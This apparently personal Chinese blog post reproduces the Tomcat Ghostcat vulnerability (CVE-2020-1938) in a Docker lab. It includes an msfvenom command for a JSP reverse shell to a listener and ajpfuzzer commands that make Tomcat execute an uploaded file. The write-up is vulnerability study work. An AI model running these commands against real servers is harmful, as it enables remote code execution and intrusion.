CVE-2020-1938 Tomcat 文件包含RCE复现

CVE-2020-1938 Tomcat 文件包含RCE复现

docker环境

docker search tomcat-8.5.32
docker pull duonghuuphuc/tomcat-8.5.32
docker run -d -p 8080:8080 -p 8009:8009 --name ghostcat duonghuuphuc/tomcat-8.5.32
docker port ghostcat

MSF生成反弹马并监听

  1. 生成jspshell为shell.txt
    msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.0.104 LPORT=999 -f raw > shell.txt
  2. 监听

复现

  1. 上传shell.txt至ROOT

  2. ajpfuzzer
    https://github.com/doyensec/ajpfuzzer

java -jar ajpfuzzer_v0.6.jar
connect 192.168.0.102 8009
forwardrequest 2 "HTTP/1.1" "/11.jsp" 192.168.0.102 192.168.0.102 porto 8009 false "Cookie:AAAA=BBBB","Accept-Encoding:identity" "javax.servlet.include.request_uri:11.jsp","javax.servlet.include.path_info:shell.txt","javax.servlet.include.servlet_path:/"

11.jsp可以换为任意该web项目中没有的jsp文件,这样tomcat才会去调用DefaultServlet

shell应该被执行了,但不知为什么一直建立不了session

参考

https://mp.weixin.qq.com/s?__biz=MzUyNDk0MDQ3OQ==&mid=2247485009&idx=1&sn=5f619c27ec994949f5fa69d41d2dee05&chksm=fa24e381cd536a972db2cc5a5fc09be33a7833f1caa6440bb5979d3d7ea052384645fbd2b62c&mpshare=1&scene=23&srcid=&sharer_sharetime=1584439554350&sharer_shareid=1f92b9e8670fffeb7eea157894e3536a#rd

posted @ 2020-03-18 15:27  雨九九  阅读(1764)  评论(0编辑  收藏  举报